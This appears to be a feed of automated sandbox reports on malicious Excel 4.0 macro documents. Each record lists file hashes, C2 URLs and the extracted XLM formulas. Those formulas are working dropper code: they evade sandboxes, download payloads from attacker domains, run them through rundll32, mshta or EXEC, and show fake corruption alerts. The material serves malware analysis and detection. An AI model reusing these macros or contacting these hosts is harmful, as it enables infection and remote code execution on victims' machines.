{"version":"0.2","sample":{"sample":"","kind":"file","target":"af4e38cb9d90c3f4d18718e12af3df53094b0655f302e94d7b3a825ac3ab93d3"},"analysis":{"reported":"2020-04-09T16:18:19Z","score":10},"files":[{"filename":"af4e38cb9d90c3f4d18718e12af3df53094b0655f302e94d7b3a825ac3ab93d3","filesize":185344,"md5":"522a4010dd87b28dccb3dd5ffdb4b424","sha1":"cfd72c3093868718e8f8f5f19ab1b833e2e0a388","sha256":"af4e38cb9d90c3f4d18718e12af3df53094b0655f302e94d7b3a825ac3ab93d3","sha512":"474290a6056ae1a768a324770c043348b3ab2b427e1c2904aedf455ca7e1e337af8f9b77168f41eadc024369dd0023de53e051aeaf919c95936839eeefcb6588","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af4e38cb9d90c3f4d18718e12af3df53094b0655f302e94d7b3a825ac3ab93d3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"af4fbc168d4f694b71b3c3747b912b04998aea1ee5fe5242af91fbd6b2450152"},"analysis":{"reported":"2020-04-09T16:18:19Z","score":10},"files":[{"filename":"af4fbc168d4f694b71b3c3747b912b04998aea1ee5fe5242af91fbd6b2450152","filesize":185344,"md5":"b0654c987ffb18d4f587de46ce998f47","sha1":"0920190f0bd987912f0945e1500f5fac4a53335e","sha256":"af4fbc168d4f694b71b3c3747b912b04998aea1ee5fe5242af91fbd6b2450152","sha512":"83f72505a09fc0ffeada3690bd212e4211502c05a2e1e1a9fe7763edf4a150e069eaddf3981e7f6a5d1b4c9c4e0afece4a319975ca2707b8e73cb76cba6e74b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af4fbc168d4f694b71b3c3747b912b04998aea1ee5fe5242af91fbd6b2450152.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"af63eed1354fa9e1f6b47a46ae0f1bf80d3110a837c8f996b95e329cdddeafd0"},"analysis":{"reported":"2020-04-09T16:18:19Z","score":10},"files":[{"filename":"af63eed1354fa9e1f6b47a46ae0f1bf80d3110a837c8f996b95e329cdddeafd0","filesize":168448,"md5":"db1fa2103b6c3e61b7364b80d5a35039","sha1":"fdfc8095c1f77cd0b1c177724c333bb4ab01d2ff","sha256":"af63eed1354fa9e1f6b47a46ae0f1bf80d3110a837c8f996b95e329cdddeafd0","sha512":"329eeb40ad50ee508b9e14e445289302b23b95480d70d8ff81967eddbd3047b8f4812d30bd0bd454df261fd8b88d1ec878fe919e6f185a0a39875512f7f9d827","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af63eed1354fa9e1f6b47a46ae0f1bf80d3110a837c8f996b95e329cdddeafd0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"f1BenfItPa\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"af9ee9617fda47db6457dfcae2e675e52e5e3546f6a45c67c1d740684ee5b4c4"},"analysis":{"reported":"2020-04-09T16:18:20Z","score":10},"files":[{"filename":"af9ee9617fda47db6457dfcae2e675e52e5e3546f6a45c67c1d740684ee5b4c4","filesize":185344,"md5":"c0823436085823179eb030a99cb82674","sha1":"afca10abe3c4cfa2481e64522b135bec5e71a9ac","sha256":"af9ee9617fda47db6457dfcae2e675e52e5e3546f6a45c67c1d740684ee5b4c4","sha512":"0d472a12d32d54ed43dbcabc3616ce152c6b5c93f6a427d8ceb7a12240d2f67d3296fe848eb667f327a9f5cb7999ae6a50b990656ac0b651e9e73aa36c8483c0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"af9ee9617fda47db6457dfcae2e675e52e5e3546f6a45c67c1d740684ee5b4c4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"afa57d6fd5fafa7112f4e303d2939cb55bf295c6f3cf302d53afd8463fb2ef37"},"analysis":{"reported":"2020-04-09T16:18:20Z","score":10},"files":[{"filename":"afa57d6fd5fafa7112f4e303d2939cb55bf295c6f3cf302d53afd8463fb2ef37","filesize":185344,"md5":"3051755d1d341b80d50fe54a7fc7474f","sha1":"e224f9afe9bc256b6cb93a31a69a6f42174865c7","sha256":"afa57d6fd5fafa7112f4e303d2939cb55bf295c6f3cf302d53afd8463fb2ef37","sha512":"1c0b816f75a7130346575dd4c889ccfcf480260879c3486d06be9fde350cb42bbe127e32dad4f00f4fc4c27e457c413b3b0ab3eb1787e4def1f14c6c2ee3d1fa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"afa57d6fd5fafa7112f4e303d2939cb55bf295c6f3cf302d53afd8463fb2ef37.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"afc87fcc2d7fd0152961612639d0df0e835636f7d59a351dc6d342767f9b3a50"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"afc87fcc2d7fd0152961612639d0df0e835636f7d59a351dc6d342767f9b3a50","filesize":193024,"md5":"6754466d8c0b7c2399a0ddea3ae9d1c6","sha1":"7168ad8be740f70f3cb7297d8a763ef3ac6e8a2f","sha256":"afc87fcc2d7fd0152961612639d0df0e835636f7d59a351dc6d342767f9b3a50","sha512":"49f4a74acab50fb6a3ecb3d78e8c3858f4ecc1d2cf9a4f426849585968ede88d781490ff09f72d4e3a2c34bc444bd6b2ef9e039b29179e85d1c437ed2fb086b0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"afc87fcc2d7fd0152961612639d0df0e835636f7d59a351dc6d342767f9b3a50.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"EXEC(\"mshta https://loubanas.xyz/kybYntXL\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(TRUE)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"afc9f7e91fa0d13b75d6879c7d7f8c895656d879031a069a4a09e25b4e20b7b9"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"afc9f7e91fa0d13b75d6879c7d7f8c895656d879031a069a4a09e25b4e20b7b9","filesize":167936,"md5":"2503395929695f833f9101c255f4f480","sha1":"3daa6a277cc7016df0781213b47fb48a8b1e85eb","sha256":"afc9f7e91fa0d13b75d6879c7d7f8c895656d879031a069a4a09e25b4e20b7b9","sha512":"d38aef0b5d520504c1857829a634a73c1b615a3ba377f94b5277733c1dae7aee4f079344398f4e3e237d40ff3c93acaeae2097dd5b116e17dbbac0e71fa8a388","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"afc9f7e91fa0d13b75d6879c7d7f8c895656d879031a069a4a09e25b4e20b7b9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"75FLntjAEY\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"afdbef60edb1297840727ea528baeaa834051ee4a6e8868dff870af7cfd11d43"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"afdbef60edb1297840727ea528baeaa834051ee4a6e8868dff870af7cfd11d43","filesize":113664,"md5":"788cc4513b22323d33686a193b20b196","sha1":"0166b0e92acb75c66a57e3a595cb4033ce5cb4f8","sha256":"afdbef60edb1297840727ea528baeaa834051ee4a6e8868dff870af7cfd11d43","sha512":"4501ae565b0026c4153371aa921f7084bdc2dc7701154f9d5b9382c1ed275e16c71a249ca81b0b29e7215e9688bf1a45de5e22efc2b3b5aa17549f2ee5368135","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"afdbef60edb1297840727ea528baeaa834051ee4a6e8868dff870af7cfd11d43.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://murreeweather.com/wp-content/white/444444.png","http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png","http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png","http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png"],"attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://murreeweather.com/wp-content/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0)\nIF(R$6C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://batilservice.xyz/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$7C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://tubolso.cl/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$8C$0\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://freespacemarketing.com/wp-content/uploads/2020/02/white/444444.png\",\"c:\\Users\\Public\\jkqnrlvkrq.exe\",0,0),GOTO(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)))\nIF(R$9C$0\u003c0,CLOSE(FALSE),)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nEXEC(\"c:\\Users\\Public\\jkqnrlvkrq.exe\")\nCLOSE(FALSE)\nRETURN()\nWORKBOOK.HIDE(\"lsbHOZq3rF\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"afdd75b5ddb5b97916f11367b6959dc29f59b69ce610852b864da7f77ab3f5ed"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"afdd75b5ddb5b97916f11367b6959dc29f59b69ce610852b864da7f77ab3f5ed","filesize":152576,"md5":"97ebaf72b7586afc89d78aaa79b3351d","sha1":"70dd5d327878db663aceae6fe2a776fcf4253286","sha256":"afdd75b5ddb5b97916f11367b6959dc29f59b69ce610852b864da7f77ab3f5ed","sha512":"1a7a0b280e98ba9252d7c9cbadc8c91cc038212a55ef8128a2688f8d25a2a1696dffa61401d09c452d1f96c590cc5fb11013c82b6059d44bf074f14cf482ebf3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"afdd75b5ddb5b97916f11367b6959dc29f59b69ce610852b864da7f77ab3f5ed.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"J50RCN7TeD\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"afde9a30877df9bc926c0b0bd221937efc22dc03837e46ea6620bfbfaebc5648"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"afde9a30877df9bc926c0b0bd221937efc22dc03837e46ea6620bfbfaebc5648","filesize":152576,"md5":"7ef2b43c65b0c0f90f16bf8c2c2a7bd4","sha1":"327a631b791250a03d6045ccb538a6850b87f596","sha256":"afde9a30877df9bc926c0b0bd221937efc22dc03837e46ea6620bfbfaebc5648","sha512":"df1127092884ae9944a6b882318abc89fe80f8e50339a4864ece835235759ea6f38fb22e660be5f1f8cb01b4fa93b75dc7a07a73cd2decafa05ed95f85956abd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"afde9a30877df9bc926c0b0bd221937efc22dc03837e46ea6620bfbfaebc5648.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ciJMr4195u\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"afe06797c62514fe2e645443334755f359fddd41badaab78157dfa86570f48b6"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"afe06797c62514fe2e645443334755f359fddd41badaab78157dfa86570f48b6","filesize":214528,"md5":"4189957674a99a9589ed31999515e41d","sha1":"b4d851ce0339510c25664bd4ffb40250e2644883","sha256":"afe06797c62514fe2e645443334755f359fddd41badaab78157dfa86570f48b6","sha512":"9c9a785e334b0ea97a0c9e4befff8595f934a31e192eedbb871ab812f87afadaef7f445e133458a946a4c70f05bf3fb790394b69e37a4a481c08b2dd738bf26f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"afe06797c62514fe2e645443334755f359fddd41badaab78157dfa86570f48b6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FMySWHS9Sp\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"afe83a460fa894b698d91449272cd570bd7db973cfd0ffd9dbac91adea100723"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"afe83a460fa894b698d91449272cd570bd7db973cfd0ffd9dbac91adea100723","filesize":167936,"md5":"365058cb2c05d84df8cfb1d568c7b97a","sha1":"a67c28ec71af4ce8622920e0b0a0e6c3488a9958","sha256":"afe83a460fa894b698d91449272cd570bd7db973cfd0ffd9dbac91adea100723","sha512":"0aa2109e0d9a68bfc5a98418a3de94a11bba87e5af382ef7a14502262e123c26976045ca60511345e827a8e263a0fb76289ea2aa4a88a0f412b66b758f5a634a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"afe83a460fa894b698d91449272cd570bd7db973cfd0ffd9dbac91adea100723.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5YonzJ9PSk\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"aff8943927c8f5db5a1ed13fe802a98076a3752ca106a3d4cead1ab526207c44"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"aff8943927c8f5db5a1ed13fe802a98076a3752ca106a3d4cead1ab526207c44","filesize":167936,"md5":"4a4363d446bb70af49b75caf32aff918","sha1":"1c956b5168de357c55696a197562d835a8704a1d","sha256":"aff8943927c8f5db5a1ed13fe802a98076a3752ca106a3d4cead1ab526207c44","sha512":"c62cb064911bed196b2a0989a92c6a66d225b9967acf84adfbf01a24a3fa5935c216eda280a92a21200627024474df59a00700ef27d6eb2741974942b40d89fc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"aff8943927c8f5db5a1ed13fe802a98076a3752ca106a3d4cead1ab526207c44.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uJgHb1xWU0\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b0148a1d75f9a173af2ef03f7542ef9bfc979510728b1e02d3c2361c55723252"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"b0148a1d75f9a173af2ef03f7542ef9bfc979510728b1e02d3c2361c55723252","filesize":104448,"md5":"2a3b08bc72c97bc81eaccccdb8cf574f","sha1":"88804cff9b7798df95f0def858ef540e287c42bc","sha256":"b0148a1d75f9a173af2ef03f7542ef9bfc979510728b1e02d3c2361c55723252","sha512":"0728a3346c90db36048464d26420269fed65d5163c839a65e83db875de825f855b99ea4b632574ffc72de23b65f871a46ed56641cc0c86773533d05804c0e687","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b0148a1d75f9a173af2ef03f7542ef9bfc979510728b1e02d3c2361c55723252.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"LoYgrHJeRG\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b018355cf2182e3e81a2163a091c65c2e754c9b74406487e028b41f2789a6b4d"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"b018355cf2182e3e81a2163a091c65c2e754c9b74406487e028b41f2789a6b4d","filesize":209920,"md5":"303411c12dff3de861dc4d56eefa70d4","sha1":"9b04dc6c5787ee50256ca8b74f113585e2541cae","sha256":"b018355cf2182e3e81a2163a091c65c2e754c9b74406487e028b41f2789a6b4d","sha512":"7b758f51d56ec5d6237e86ea5ec95f722fa892bd16fe11346653a04f200e309d7842eb7ddf464ef0f10373654aaea78006e84938765776812911c8b39502bab5","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b018355cf2182e3e81a2163a091c65c2e754c9b74406487e028b41f2789a6b4d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"cjdd5hiJKV\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"b026d5f04b9f6da981d68f044a819cd3cc8fa211e4fb3f2305dbec26b2dd2c3b"},"analysis":{"reported":"2020-04-09T16:18:21Z","score":10},"files":[{"filename":"b026d5f04b9f6da981d68f044a819cd3cc8fa211e4fb3f2305dbec26b2dd2c3b","filesize":152576,"md5":"3e979c15c058bf836255a34e6152bdd4","sha1":"0e093c976f17ec3befb27fac4dcdb05955848828","sha256":"b026d5f04b9f6da981d68f044a819cd3cc8fa211e4fb3f2305dbec26b2dd2c3b","sha512":"67deb4b7fe565450e7e05809ad9b614bf523fb31381826db18c24a7ba36b68556181d6359389d742ab5d15b51c7180490cf6bdb12b530384021bc299c30ce618","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"b026d5f04b9f6da981d68f044a819cd3cc8fa211e4fb3f2305dbec26b2dd2c3b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's 